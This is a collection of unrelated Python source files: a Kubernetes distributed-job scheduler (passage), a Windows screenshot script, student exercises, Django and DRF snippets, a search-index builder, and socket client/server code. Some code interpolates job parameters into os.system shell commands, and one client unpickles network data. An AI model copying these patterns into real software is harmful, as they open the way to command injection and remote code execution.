    if "userId" not in jobParams:
        jobParams["userId"] = "0"
    jobPath,workPath,dataPath = GetStoragePath(jobParams["jobPath"],jobParams["workPath"],jobParams["dataPath"])
    localJobPath = os.path.join(config["storage-mount-path"],jobPath)
    logPath = os.path.join(localJobPath,"logs/joblog.txt")
    result, detail = k8sUtils.GetJobStatus(job["jobId"])
    # BUGFIX: detail is a decoded JSON object here (UpdateJobStatus and
    # KillJob both store base64.b64encode(json.dumps(detail))); calling
    # b64encode on a non-string raised a TypeError.
    dataHandler.UpdateJobTextField(job["jobId"],"jobStatusDetail",base64.b64encode(json.dumps(detail)))
    logging.info("job %s status: %s,%s" % (job["jobId"], result, json.dumps(detail)))
    jobDescriptionPath = os.path.join(config["storage-mount-path"], job["jobDescriptionPath"]) if "jobDescriptionPath" in job else None
    jobId = jobParams["jobId"]
    workerPodInfo = k8sUtils.GetPod("distRole=worker,run=" + jobId)
    psPodInfo = k8sUtils.GetPod("distRole=ps,run=" + jobId)
    # Only act once every expected worker and ps pod exists.
    if "items" in workerPodInfo and len(workerPodInfo["items"]) == int(jobParams["numpsworker"]) and "items" in psPodInfo and len(psPodInfo["items"]) == int(jobParams["numps"]):
        if job["jobStatus"] == "scheduling" :
            launch_ps_dist_job(jobParams)
        if job["jobStatus"] == "running":
            result, detail = GetDistJobStatus(job["jobId"])
            # NOTE(review): GetDistJobStatus's detail type is not visible
            # here; kept as-is -- confirm it returns a b64encode-able string.
            dataHandler.UpdateJobTextField(job["jobId"],"jobStatusDetail",base64.b64encode(detail))
            printlog("job %s status: %s" % (job["jobId"], result))
            jobDescriptionPath = os.path.join(config["storage-mount-path"], job["jobDescriptionPath"]) if "jobDescriptionPath" in job else None
            if result.strip() == "Succeeded":
                joblog_manager.extract_job_log(job["jobId"],logPath,jobParams["userId"])
                dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","finished")
                if jobDescriptionPath is not None and os.path.isfile(jobDescriptionPath):
                    k8sUtils.kubectl_delete(jobDescriptionPath)
            elif result.strip() == "Running":
                joblog_manager.extract_job_log(job["jobId"],logPath,jobParams["userId"])
                if job["jobStatus"] != "running":
                    dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","running")
                if "interactivePort" in jobParams:
                    # Publish service endpoints for interactive jobs.
                    serviceAddress = k8sUtils.GetServiceAddress(job["jobId"])
                    serviceAddress = base64.b64encode(json.dumps(serviceAddress))
                    dataHandler.UpdateJobTextField(job["jobId"],"endpoints",serviceAddress)
            elif result.strip() == "Failed":
                printlog("Job %s fails, cleaning..." % job["jobId"])
                joblog_manager.extract_job_log(job["jobId"],logPath,jobParams["userId"])
                dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","failed")
                dataHandler.UpdateJobTextField(job["jobId"],"errorMsg",detail)
                if jobDescriptionPath is not None and os.path.isfile(jobDescriptionPath):
                    k8sUtils.kubectl_delete(jobDescriptionPath)
            elif result.strip() == "Unknown":
                # 300-second grace period before treating "Unknown" as failure.
                if job["jobId"] not in UnusualJobs:
                    UnusualJobs[job["jobId"]] = datetime.datetime.now()
                elif (datetime.datetime.now() - UnusualJobs[job["jobId"]]).seconds > 300:
                    del UnusualJobs[job["jobId"]]
                    retries = dataHandler.AddandGetJobRetries(job["jobId"])
                    if retries >= 5:
                        printlog("Job %s fails for more than 5 times, abort" % job["jobId"])
                        dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","error")
                        dataHandler.UpdateJobTextField(job["jobId"],"errorMsg","cannot launch the job.")
                        if jobDescriptionPath is not None and os.path.isfile(jobDescriptionPath):
                            k8sUtils.kubectl_delete(jobDescriptionPath)
                    else:
                        printlog("Job %s fails in Kubernetes, delete and re-submit the job. Retries %d" % (job["jobId"] , retries))
                        SubmitJob(job)
            if result.strip() != "Unknown" and job["jobId"] in UnusualJobs:
                del UnusualJobs[job["jobId"]]
def run_dist_cmd_on_pod(podId, cmd, outputfile):
    # Run *cmd* inside pod *podId* via "kubectl exec", capturing output
    # to the local file *outputfile*.
    remotecmd = "exec %s -- %s" % (podId,cmd)
    print remotecmd
    k8sUtils.kubectl_exec_output_to_file(remotecmd,outputfile)
class Kube_RemoteCMD_Thread(threading.Thread):
    # Thread wrapper around run_dist_cmd_on_pod so several pods can be
    # driven concurrently.
    def __init__(self, jobId, podId, cmd, outputfile):
        threading.Thread.__init__(self)
        self.jobId = jobId            # job the command belongs to
        self.podId = podId            # target pod name
        self.cmd = cmd                # shell command to execute in the pod
        self.outputfile = outputfile  # local file receiving the output
    def run(self):
        run_dist_cmd_on_pod(self.podId, self.cmd, self.outputfile)
def launch_ps_dist_job(jobParams):
    # Once every ps/worker pod of a TensorFlow PS distributed job is Running,
    # generate per-task launch scripts (wiring --ps_hosts/--worker_hosts and
    # --task_index), copy them into the pods, and flip the job to "running".
    jobId = jobParams["jobId"]
    workerPodInfo = k8sUtils.GetPod("distRole=worker,run=" + jobId)
    psPodInfo = k8sUtils.GetPod("distRole=ps,run=" + jobId)
    # Proceed only when every expected pod exists...
    if "items" in workerPodInfo and len(workerPodInfo["items"]) == int(jobParams["numpsworker"]) and "items" in psPodInfo and len(psPodInfo["items"]) == int(jobParams["numps"]):
        podStatus = [k8sUtils.check_pod_status(pod) for pod in workerPodInfo["items"] + psPodInfo["items"] ]
        # ...and every pod is Running.
        if all([status == "Running" for status in podStatus]):
            ps_pod_names = [pod["metadata"]["name"] for pod in psPodInfo["items"]]
            worker_pod_names = [pod["metadata"]["name"] for pod in workerPodInfo["items"]]
            ps_pod_ips = [pod["status"]["podIP"] for pod in psPodInfo["items"]]
            worker_pod_ips = [pod["status"]["podIP"] for pod in workerPodInfo["items"]]
            ps_num = len(psPodInfo["items"])
            worker_num = len(workerPodInfo["items"])
            # Each pod advertises its distributed-training port via a label.
            ps_ports = [int(item["metadata"]["labels"]["distPort"]) for item in psPodInfo["items"]]
            worker_ports = [int(item["metadata"]["labels"]["distPort"]) for item in workerPodInfo["items"]]
            #port range: 30000~31000
            #rndList = range(max(1000,ps_num + worker_num))
            #random.shuffle(rndList)
            #ps_ports = [rndList[i] + 30000 for i in range(ps_num)]
            #worker_ports = [rndList[i + ps_num] + 30000 for i in range(worker_num)]
            ps_hosts = ",".join(["%s:%s" % (ps_pod_ips[i],ps_ports[i]) for i in range(ps_num)])
            worker_hosts = ",".join(["%s:%s" % (worker_pod_ips[i],worker_ports[i]) for i in range(worker_num)])
            # ps_files/worker_files start out as unique /tmp directories and
            # are re-pointed below at the run_dist_job.sh inside each one.
            ps_files = ["/tmp/" + str(uuid.uuid4()) for i in range(ps_num)]
            worker_files = ["/tmp/" + str(uuid.uuid4()) for i in range(worker_num)]
            ps_cmd = ["%s --ps_hosts=%s --worker_hosts=%s --job_name=ps --task_index=%d 2>&1 | tee %s" % (jobParams["cmd"], ps_hosts,worker_hosts,i,ps_files[i]) for i in range(ps_num)]
            worker_cmd = ["%s --ps_hosts=%s --worker_hosts=%s --job_name=worker --task_index=%d 2>&1 | tee %s" % (jobParams["cmd"], ps_hosts,worker_hosts,i,worker_files[i]) for i in range(worker_num)]
            for i in range(ps_num):
                os.system("mkdir -p %s" % ps_files[i])
                ps_files[i] = os.path.join(ps_files[i],"run_dist_job.sh")
                with open(ps_files[i], 'w') as f:
                    f.write(ps_cmd[i] + "\n")
                    f.close()
                if "userId" in jobParams:
                    os.system("chown -R %s %s" % (jobParams["userId"], ps_files[i]))
                remotecmd = "cp %s %s:/opt/run_dist_job.sh" % (ps_files[i],ps_pod_names[i])
                k8sUtils.kubectl_exec(remotecmd)
                # Marker file signals the pod-side wrapper the script is ready.
                k8sUtils.kubectl_exec("exec %s touch /opt/run_dist_job" % ps_pod_names[i])
            for i in range(worker_num):
                os.system("mkdir -p %s" % worker_files[i])
                worker_files[i] = os.path.join(worker_files[i],"run_dist_job.sh")
                with open(worker_files[i], 'w') as f:
                    f.write(worker_cmd[i] + "\n")
                    f.close()
                if "userId" in jobParams:
                    os.system("chown -R %s %s" % (jobParams["userId"], worker_files[i]))
                remotecmd = "cp %s %s:/opt/run_dist_job.sh" % (worker_files[i],worker_pod_names[i])
                k8sUtils.kubectl_exec(remotecmd)
                k8sUtils.kubectl_exec("exec %s touch /opt/run_dist_job" % worker_pod_names[i])
            dataHandler = DataHandler()
            dataHandler.UpdateJobTextField(jobParams["jobId"],"jobStatus","running")
            # (historical thread-based launcher kept for reference)
            #ps_threads = [Kube_RemoteCMD_Thread(jobId,ps_pod_names[i],ps_cmd[i],ps_logfiles[i]) for i in range(ps_num)]
            #worker_threads = [Kube_RemoteCMD_Thread(jobId,worker_pod_names[i],worker_cmd[i],worker_logfiles[i]) for i in range(worker_num)]
            #for t in ps_threads:
            #    t.start()
            #for t in worker_threads:
            #    t.start()
            #while (True):
            #for t in ps_threads:
            #    print t.isAlive()
            #time.sleep(5)
            #cmd = "test"
            #thread.start_new_thread( run_dist_cmd_on_pod,
            #(workerPodInfo["items"][0]["metadata"]["name"], cmd) )
def create_log(logdir='/var/log/dlworkspace'):
    """Configure process-wide logging from logging.yaml.

    Ensures *logdir* exists, loads the YAML logging configuration, and points
    the file handler at <logdir>/jobmanager.log before applying it.
    """
    if not os.path.exists(logdir):
        os.makedirs(logdir)  # replaces shelling out to "mkdir -p"
    with open('logging.yaml') as f:
        # safe_load: the config file is plain data, and yaml.load without an
        # explicit Loader is deprecated and unsafe on untrusted input.
        logging_config = yaml.safe_load(f)
    logging_config["handlers"]["file"]["filename"] = logdir + "/jobmanager.log"
    logging.config.dictConfig(logging_config)
def Run():
    # Main scheduler loop: refresh node labels, then walk all pending jobs
    # and advance each one according to its current status. Never returns.
    while True:
        try:
            # Node label maps are refreshed every pass (nodes may come/go).
            config["racks"] = k8sUtils.get_node_labels("rack")
            config["skus"] = k8sUtils.get_node_labels("sku")
        except Exception as e:
            print e
        try:
            dataHandler = DataHandler()
            pendingJobs = dataHandler.GetPendingJobs()
            printlog("updating status for %d jobs" % len(pendingJobs))
            for job in pendingJobs:
                try:
                    print "Processing job: %s, status: %s" % (job["jobId"], job["jobStatus"])
                    if job["jobStatus"] == "queued":
                        SubmitJob(job)
                    elif job["jobStatus"] == "killing":
                        KillJob(job)
                    elif job["jobStatus"] == "scheduling" or job["jobStatus"] == "running" :
                        UpdateJobStatus(job)
                    elif job["jobStatus"] == "unapproved" :
                        AutoApproveJob(job)
                except Exception as e:
                    # One bad job must not stop processing of the rest.
                    print e
        except Exception as e:
            print e
        time.sleep(1)

# Script entry point.
if __name__ == '__main__':
    Run()
    #print k8sUtils.get_pod_events("d493d41c-45ea-4e85-8ca4-01c3533cd727")
|
# -*- coding: cp936 -*-
import Image
import os, win32gui, win32ui, win32con, win32api
def window_capture(dpath,imagetype = '.jpg'):
    '''Capture the full primary screen to an image file.

    Call as window_capture('E:\\'); *dpath* is the directory the image is
    moved to.  Returns the image file name (e.g. "ttt.jpg").
    '''
    hwnd = 0  # 0 = desktop window, i.e. the whole screen
    hwndDC = win32gui.GetWindowDC(hwnd)
    mfcDC=win32ui.CreateDCFromHandle(hwndDC)
    saveDC=mfcDC.CreateCompatibleDC()
    saveBitMap = win32ui.CreateBitmap()
    MoniterDev=win32api.EnumDisplayMonitors(None,None)
    # Monitor rectangle of the first display: (left, top, right, bottom).
    w = MoniterDev[0][2][2]
    h = MoniterDev[0][2][3]
    #print w,h  # image size
    saveBitMap.CreateCompatibleBitmap(mfcDC, w, h)
    saveDC.SelectObject(saveBitMap)
    # Blit the screen DC into the in-memory bitmap.
    saveDC.BitBlt((0,0),(w, h) , mfcDC, (0,0), win32con.SRCCOPY)
    # cc=time.gmtime()
    # bmpname=str(cc[0])+str(cc[1])+str(cc[2])+str(cc[3]+8)+str(cc[4])+str(cc[5])+'.bmp'
    bmpname = 'ttt'
    saveBitMap.SaveBitmapFile(saveDC, bmpname)
    # Convert the temporary BMP to the requested format, then move it to dpath.
    Image.open(bmpname).save(bmpname+imagetype)
    os.remove(bmpname)
    jpgname=bmpname+imagetype
    djpgname=dpath+jpgname
    copy_command = "move %s %s" % (jpgname, djpgname)
    os.popen(copy_command)
    return bmpname+imagetype
def main():
    # Demo entry point: capture the screen and save the image to E:\.
    window_capture('E:\\')

if __name__ =="__main__":
    main()
from typing import Any, Optional
class Response:
    """Lightweight response object carrying arbitrary keyword fields.

    A truthy explicit *status* wins over one passed via **kwargs, which in
    turn wins over the class-level default 'ok'.
    """

    status: str = 'ok'

    def __init__(self, status: Optional[str] = None, **kwargs: Any) -> None:
        # kwargs first, so an explicit status argument can override them.
        self.__dict__.update(kwargs)
        self.status = status if status else self.status
|
# Tyler Pettigrew
# CS362-HW1
""""To run this program, an IDE like Pycharm or the command line can be used
command line: run "python Tyler_Pettigrew_hw1.py" in the terminal where the file is located
Pycharm/Other IDE: Use the IDE's internal run function
"""
"""leap_year
Inputs:
year: a positive integer number
Outputs:
If the given year is a leap year based on the given criteria, print that the year is a leap year.
Otherwise, say it isn't
"""
def leap_year(year):
    """Print whether *year* is a leap year.

    Gregorian rule: divisible by 4, except century years, which must also be
    divisible by 400.
    """
    if year % 4 != 0:
        print(year, "is not a leap year")
    elif year % 100 != 0:
        print(year, "is a leap year")
    elif year % 400 == 0:
        # Century divisible by 400 (this branch's message ends with a period,
        # matching the original output exactly).
        print(year, "is a leap year.")
    else:
        print(year, "is not a leap year")
if __name__ == '__main__':
    # Interactive driver: prompt until a numeric year (or 'q') is entered.
    year = input("Enter the year, or 'q' to quit: ")
    # If the escape character 'q' is pressed, exit the program
    if year.strip().lower() == "q":
        exit(0)
    # Strip any extra spaces, and try to convert the string to a number. If it fails, reprompt until a correct number
    # is given or the user quits
    year = year.strip()
    while not (year.isnumeric()):
        year = input("Year not recognized: Enter the year or q to quit: ")
        if year.strip().lower() == "q":
            exit(0)
    # isnumeric() already guarantees a non-negative integer, so abs() is a no-op.
    year = abs(int(year.strip()))
    leap_year(year)
|
from itertools import groupby
def ones_counter(nums):
    """Sum each maximal run of equal truthy values in *nums*.

    For 0/1 input this yields the length of every run of ones, e.g.
    [1, 1, 0, 1] -> [2, 1].
    """
    runs = []
    previous = object()  # sentinel that never equals an element
    for value in nums:
        if value and value == previous:
            runs[-1] += value      # extend the current run
        elif value:
            runs.append(value)     # start a new run
        previous = value
    return runs
|
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import get_object_or_404, render
from trivia.models import Question, Choice
from locations.models import Page
from django.urls import reverse
from django.views import generic
import requests
import json
def trivia(request, slug):
    """View function for home page of TRIVIA."""
    template_name = 'trivia/game.html'
    # Pull the quiz's questions plus its choices in chronological order.
    quiz_questions = Question.objects.filter(quiz__slug=slug)
    quiz_choices = Choice.objects.filter(question__quiz__slug=slug).order_by('created')
    question_total = quiz_questions.count()
    points_total = sum(q.points for q in quiz_questions)
    context = {
        'slug': slug,
        'total_points': points_total,
        'num_questions': question_total,
        'questions': quiz_questions,
        'choices': quiz_choices,
        'error_message': "You didn't select a choice.",
    }
    return render(request, template_name, context=context)
# def game(request, slug):
# questions = Question.objects.filter(quiz__slug=slug)
# choices = Choice.objects.filter(question__quiz__slug=slug).order_by('created')
# total_points = sum([question.points for question in questions])
# num_questions = questions.count()
# # template_name = 'scoreboard/score_board.html'
# template_name = 'trivia/game.html'
# try:
# selected_choices = questions.get(request.POST['choice'])
# except (KeyError, Choice.DoesNotExist):
# context = {
# 'slug': slug,
# 'total_points': total_points,
# 'num_questions': num_questions,
# 'questions': questions[:1],
# 'choices': choices,
# 'error_message': "You didn't select a choice.",
# }
# return render(request, template_name, context=context)
# else:
# if selected_choices.correct:
# # Always return an HttpResponseRedirect after successfully dealing
# # with POST data. This prevents data from being posted twice if a
# # user hits the Back button.
# return HttpResponseRedirect(reverse('highscore'))
|
from rest_framework import serializers
from scuba_dive_data.models import ScubaDiveData
class ScubaDiveDataSerializer(serializers.ModelSerializer):
    """DRF model serializer exposing every field of ScubaDiveData."""
    class Meta:
        model = ScubaDiveData
        fields = '__all__'
|
import json
import os
from algoliasearch import algoliasearch
## Algolia Credentials
client = algoliasearch.Client("7EK9KHJW8M", os.environ['ALGOLIA_API_KEY'])
index = client.init_index('schema')

## Load plotschema.json
# Note _data/plotschema.json is updated upon each deploy
p = json.load(open('_data/plotschema.json'))
schema = []

## Data Level 1: Traces
# Add trace dictionaries to schema array.
# The trace dictionary include name: trace name, permalink: reference/#trace-name, and description if applicable.
for i in p['schema']['traces']:
    trace = {}
    trace ['name'] = i
    trace ['permalink'] = 'reference/#'+i
    if p['schema']['traces'][i]['meta']:
        # Descriptions use *...* emphasis; the asterisks become quotes.
        trace ['description'] = (p['schema']['traces'][i]['meta']['description']).replace('*', '"')
    else: pass
    schema.append(trace)

## Data Level 2: Nested Attributes
# Walk trace attributes up to four levels deep, skipping bookkeeping keys
# (src/_deprecated/impliedEdits/uid/editType). Each try/except falls back to
# a generic "Properties for X" record when an attribute has no 'description';
# the bare excepts also swallow non-dict leaves.
# NOTE(review): bare "except:" hides all other errors too -- narrow these
# to KeyError/TypeError when this script is next touched.
for i in p['schema']['traces']:
    for att1 in p['schema']['traces'][i]['attributes']:
        if not any(value in att1 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
            try:
                attribute = {}
                attribute ['name'] = i+' > '+att1
                attribute ['permalink'] = 'reference/#'+i+'-'+att1
                attribute ['description'] = (p['schema']['traces'][i]['attributes'][att1]['description']).replace('*', '"')
                schema.append(attribute)
            except:
                attribute = {}
                attribute ['name'] = i+' > '+att1
                attribute ['permalink'] = 'reference/#'+i+'-'+att1
                attribute ['description'] = 'Properties for '+att1
                schema.append(attribute)
            for att2 in p['schema']['traces'][i]['attributes'][att1]:
                if not any(value in att2 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
                    try:
                        if isinstance(p['schema']['traces'][i]['attributes'][att1][att2], dict):
                            try:
                                attribute = {}
                                attribute ['name'] = i+' > '+att1+' > '+att2
                                attribute ['permalink'] = 'reference/#'+i+'-'+att1+'-'+att2
                                attribute ['description'] = (p['schema']['traces'][i]['attributes'][att1][att2]['description']).replace('*', '"')
                                schema.append(attribute)
                            except:
                                attribute = {}
                                attribute ['name'] = i+' > '+att1+' > '+att2
                                attribute ['permalink'] = 'reference/#'+i+'-'+att1+'-'+att2
                                attribute ['description'] = 'Properties for '+att2
                                schema.append(attribute)
                    except:
                        pass
                    try:
                        for att3 in p['schema']['traces'][i]['attributes'][att1][att2]:
                            if not any(value in att3 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
                                try:
                                    if isinstance(p['schema']['traces'][i]['attributes'][att1][att2][att3], dict):
                                        try:
                                            attribute = {}
                                            attribute ['name'] = i+' > '+att1+' > '+att2+' > '+att3
                                            attribute ['permalink'] = 'reference/#'+i+'-'+att1+'-'+att2+'-'+att3
                                            attribute ['description'] = (p['schema']['traces'][i]['attributes'][att1][att2][att3]['description']).replace('*', '"')
                                            schema.append(attribute)
                                        except:
                                            attribute = {}
                                            attribute ['name'] = i+' > '+att1+' > '+att2+' > '+att3
                                            attribute ['permalink'] = 'reference/#'+i+'-'+att1+'-'+att2+'-'+att3
                                            attribute ['description'] = 'Properties for '+att3
                                            schema.append(attribute)
                                except:
                                    pass
                                try:
                                    for att4 in p['schema']['traces'][i]['attributes'][att1][att2][att3]:
                                        if not any(value in att4 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
                                            try:
                                                if isinstance(p['schema']['traces'][i]['attributes'][att1][att2][att3][att4], dict):
                                                    try:
                                                        attribute = {}
                                                        attribute ['name'] = i+' > '+att1+' > '+att2+' > '+att3+' > '+att4
                                                        attribute ['permalink'] = 'reference/#'+i+'-'+att1+'-'+att2+'-'+att3+'-'+att4
                                                        attribute ['description'] = (p['schema']['traces'][i]['attributes'][att1][att2][att3][att4]['description']).replace('*', '"')
                                                        schema.append(attribute)
                                                    except:
                                                        attribute = {}
                                                        attribute ['name'] = i+' > '+att1+' > '+att2+' > '+att3+' > '+att4
                                                        attribute ['permalink'] = 'reference/#'+i+'-'+att1+'-'+att2+'-'+att3+'-'+att4
                                                        attribute ['description'] = 'Properties for '+att4
                                                        schema.append(attribute)
                                            except:
                                                pass
                                except:
                                    pass
                    except:
                        pass

## Layout Attributes
# Same walk for layout attributes (up to three nested levels under 'Layout').
for att1 in p['schema']['layout']['layoutAttributes']:
    if not any(value in att1 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
        try:
            attribute = {}
            attribute ['name'] = 'Layout > '+att1
            attribute ['permalink'] = 'reference/#layout-'+att1
            attribute ['description'] = (p['schema']['layout']['layoutAttributes'][att1]['description']).replace('*', '"')
            schema.append(attribute)
        except:
            attribute = {}
            attribute ['name'] = 'Layout > '+att1
            attribute ['permalink'] = 'reference/#layout-'+att1
            attribute ['description'] = 'Properties for '+att1
            schema.append(attribute)
        for att2 in p['schema']['layout']['layoutAttributes'][att1]:
            if not any(value in att2 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
                try:
                    if isinstance(p['schema']['layout']['layoutAttributes'][att1][att2], dict):
                        try:
                            attribute = {}
                            attribute ['name'] = 'Layout > '+att1+' > '+att2
                            attribute ['permalink'] = 'reference/#layout-'+att1+'-'+att2
                            attribute ['description'] = (p['schema']['layout']['layoutAttributes'][att1][att2]['description']).replace('*', '"')
                            schema.append(attribute)
                        except:
                            attribute = {}
                            attribute ['name'] = 'Layout > '+att1+' > '+att2
                            attribute ['permalink'] = 'reference/#layout-'+att1+'-'+att2
                            attribute ['description'] = 'Properties for '+att2
                            schema.append(attribute)
                except:
                    pass
                try:
                    for att3 in p['schema']['layout']['layoutAttributes'][att1][att2]:
                        if not any(value in att3 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
                            if isinstance(p['schema']['layout']['layoutAttributes'][att1][att2][att3], dict):
                                try:
                                    attribute = {}
                                    attribute ['name'] = 'Layout > '+att1+' > '+att2+' > '+att3
                                    attribute ['permalink'] = 'reference/#layout-'+att1+'-'+att2+'-'+att3
                                    attribute ['description'] = (p['schema']['layout']['layoutAttributes'][att1][att2][att3]['description']).replace('*', '"')
                                    schema.append(attribute)
                                except:
                                    attribute = {}
                                    attribute ['name'] = 'Layout > '+att1+' > '+att2+' > '+att3
                                    attribute ['permalink'] = 'reference/#layout-'+att1+'-'+att2+'-'+att3
                                    attribute ['description'] = 'Properties for '+att3
                                    schema.append(attribute)
                                try:
                                    for att4 in p['schema']['layout']['layoutAttributes'][att1][att2][att3]:
                                        if not any(value in att4 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
                                            if isinstance(p['schema']['layout']['layoutAttributes'][att1][att2][att3][att4], dict):
                                                try:
                                                    attribute = {}
                                                    attribute ['name'] = 'Layout > '+att1+' > '+att2+' > '+att3+' > '+att4
                                                    attribute ['permalink'] = 'reference/#layout-'+att1+'-'+att2+'-'+att3+'-'+att4
                                                    attribute ['description'] = (p['schema']['layout']['layoutAttributes'][att1][att2][att3][att4]['description']).replace('*', '"')
                                                    schema.append(attribute)
                                                except:
                                                    attribute = {}
                                                    attribute ['name'] = 'Layout > '+att1+' > '+att2+' > '+att3+' > '+att4
                                                    attribute ['permalink'] = 'reference/#layout-'+att1+'-'+att2+'-'+att3+'-'+att4
                                                    attribute ['description'] = 'Properties for '+att4
                                                    schema.append(attribute)
                                except:
                                    pass
                except:
                    pass

## Send to Algolia
# Replace the entire index contents with the freshly built records.
index.clear_index()
index.add_objects(schema)
|
from Vector2 import Vector2
def getAroundingTiles(tile, map, min_coord=0, max_coord=17):
    """Return the up-to-eight neighbouring tiles of *tile* on *map*.

    Diagonal neighbours are included.  Neighbour coordinates falling outside
    the board, which spans [min_coord, max_coord] on both axes (an 18x18
    board by default), are filtered out.  The bounds were previously
    hard-coded to 0..17; they are now defaulted parameters, so existing
    callers are unaffected.
    """
    loc = tile.Position
    # All eight surrounding positions, kept in the original scan order
    # (row above, same row, row below).
    aroundingLocations = [(loc.X-1, loc.Y-1), (loc.X, loc.Y-1), (loc.X+1, loc.Y-1),
                          (loc.X-1, loc.Y),                     (loc.X+1, loc.Y),
                          (loc.X-1, loc.Y+1), (loc.X, loc.Y+1), (loc.X+1, loc.Y+1)]
    # filter locations outside the board
    return [map.GetTile(Vector2(X, Y)) for (X, Y) in aroundingLocations
            if min_coord <= X <= max_coord and min_coord <= Y <= max_coord]
|
from socket import *
import sys
def server_tcp_negotiation(welcomingSocket, req_code):
    # Negotiation phase: accept TCP connections until a client presents the
    # correct request code, then hand back a fresh UDP socket whose port
    # number has been sent to that client.
    # NOTE(review): written for Python 2 -- send()/recv() work on str here;
    # under Python 3 these would need explicit bytes encoding.
    while 1:
        # create TCP connection between clientSocket and
        # connectionSocket
        connectionSocket, addr = welcomingSocket.accept()
        # print("TCP CONNECTION REQUEST ACCEPTED")
        # receive <req_code> from client
        recv_code = connectionSocket.recv(1024)
        # print("CLIENT REQUEST CODE RECEIVED: " + recv_code)
        # verify <req_code>
        if recv_code == str(req_code):
            # print("CLIENT REQUEST CODE VERIFIED")
            # create server socket (UDP) for receiving <msg>
            recvSocket = socket(AF_INET, SOCK_DGRAM)
            # assign port number <r_port> to recvSocket (0 = OS-chosen port)
            recvSocket.bind(('',0))
            r_port = recvSocket.getsockname()[1]
            # send <r_port> to client using TCP connection
            connectionSocket.send(str(r_port))
            # print("TRANSACTION PORT NUMBER SENT: " + str(r_port))
            connectionSocket.close()
            return recvSocket
            # client will close the TCP connection after receving
            # <r_port>
        else:
            # client fails to send the intended <req_code>,
            # inform client and close the TCP connection
            # print("INVALID CLIENT REQUEST CODE")
            connectionSocket.send("-1")
            connectionSocket.close()
            # print("TCP CONNECTION CLOSED")
def server_udp_transaction(recvSocket):
    """Serve one UDP transaction: read a message, echo it back reversed.

    Closes *recvSocket* when done; each transaction uses a fresh socket
    handed over by the negotiation phase.
    """
    message, sender = recvSocket.recvfrom(2048)
    recvSocket.sendto(message[::-1], sender)
    recvSocket.close()
def main():
    # Entry point: read the request code from argv, publish the negotiation
    # port (stdout + port.txt), then serve negotiate/transact cycles forever.
    # check command line argument
    try:
        req_code = int(sys.argv[1])
    except IndexError:
        print("ERROR: MISSING REQUEST CODE")
        sys.exit(1)
    except ValueError:
        print("ERROR: REQUEST CODE MUST BE INTEGER")
        sys.exit(1)
    # create welcoming socket (TCP)
    welcomingSocket = socket(AF_INET, SOCK_STREAM)
    # assign port number <n_port> to welcoming socket (0 = OS-chosen port)
    welcomingSocket.bind(('',0))
    n_port = welcomingSocket.getsockname()[1]
    # print out <n_port> to screen and into "port.txt"
    print("SERVER_PORT=" + str(n_port))
    f = open("port.txt","w")
    f.write("SERVER_PORT=" + str(n_port))
    f.close()
    # listen for TCP connection requests from the client
    welcomingSocket.listen(1)
    # print("WAITING FOR TCP CONNECTION REQUEST")
    while 1:
        recvSocket = server_tcp_negotiation(welcomingSocket, req_code)
        server_udp_transaction(recvSocket)

if __name__ == "__main__":
    main()
|
import urllib
import xml.etree.ElementTree as ET
# Prompt for an XML document URL, fetch it, and print the sum of all
# <comments>/<comment>/<count> values.  (Python 2: raw_input, urllib.urlopen,
# print statement.)
url = raw_input('Enter url:')
url1 = urllib.urlopen(url).read()
tree = ET.fromstring(url1)
lst= []
lst1 = []
lst = tree.findall('comments/comment')
#print 'count:',len(lst)
for item in lst:
    #print 'Name',item.find('name').text
    lst1.append(int(item.find('count').text))
print sum(lst1)
class Exception:
    """Simple container for a reported error: kind, message, and position.

    NOTE(review): this class shadows Python's builtin Exception inside its
    module; renaming it would change the module's public interface, so the
    name is kept.
    """

    def __init__(self, type, description, line, column):
        self.type = type
        self.description = description
        self.line = line
        self.column = column

    def toString(self):
        # "<type> - <description> [<line> , <column>]"
        location = '[' + str(self.line) + ' , ' + str(self.column) + ']'
        return self.type + ' - ' + self.description + ' ' + location

    def getType(self):
        return self.type

    def getDescription(self):
        return self.description

    def getLine(self):
        return self.line

    def getColumn(self):
        return self.column
from CallBackOperator import CallBackOperator
class PlateauTimeCallBackOperator(CallBackOperator):
    # Binds the model's PlateauTime value to the window's PlateauTime
    # slider / line-edit pair via the CallBackOperator base machinery.
    def __init__(self, window, model, value_range):
        super().__init__(window, model, value_range)

    # overridden: pick the slider widget this operator controls
    def init_slider(self):
        self.slider = self.window.PlateauTimehorizontalSlider

    # overridden: pick the text box paired with the slider
    def init_line_edit(self):
        self.line_edit = self.window.PlateauTimelineEdit

    # overridden: wire the widgets together once both are known
    def ConnectCallBack(self):
        self.SynchronizeSliderandText()

    # overridden: push a new widget value into the model
    def value_changed(self, val):
        self.model.PlateauTime = val
#!/usr/bin/python3 # This is python_client1.py file
import socket
import threading
from time import sleep
import pickle
import tkinter as tk
from tkinter import messagebox
import re
import random
from client import Client
# -------------------------------------------------------------------------------------------------------- #
# Communication helpers (module-level `soc` is the connected server socket).

# Send a text message to the server.
def send_message(msg):
    soc.send(msg.encode("ascii"))

# Send a pickled Python object to the server.
def send_object(obj):
    soc.send(pickle.dumps(obj))

# Receive a text message from the server.
def receive_message():
    msg = soc.recv(1024).decode("ascii")
    return msg

# Receive a pickled Python object from the server.
# NOTE(review): pickle.loads on network data trusts the peer completely --
# unpickling attacker-controlled bytes can execute arbitrary code.
def receive_object():
    obj = pickle.loads(soc.recv(16384))
    return obj
# ------------------------------------------------------------------------------------------------------- #
# GUI

def start_window():
    # First screen: ask for a display name, register with the server, then
    # move on to the Part-selection screen.
    print("start window")

    def start_game():
        name = name_form.get()
        if name == "":
            # Fall back to a random guest name when the field is left empty.
            name = "GuestUser" + str(random.randint(0, 100001))
        client.set_name(name)
        send_message("system_start")
        send_object(client)
        main_frame.destroy()
        part_window()

    main_frame = tk.Frame(root)
    main_frame.place(relx=0, rely=0, relwidth=1, relheight=1)
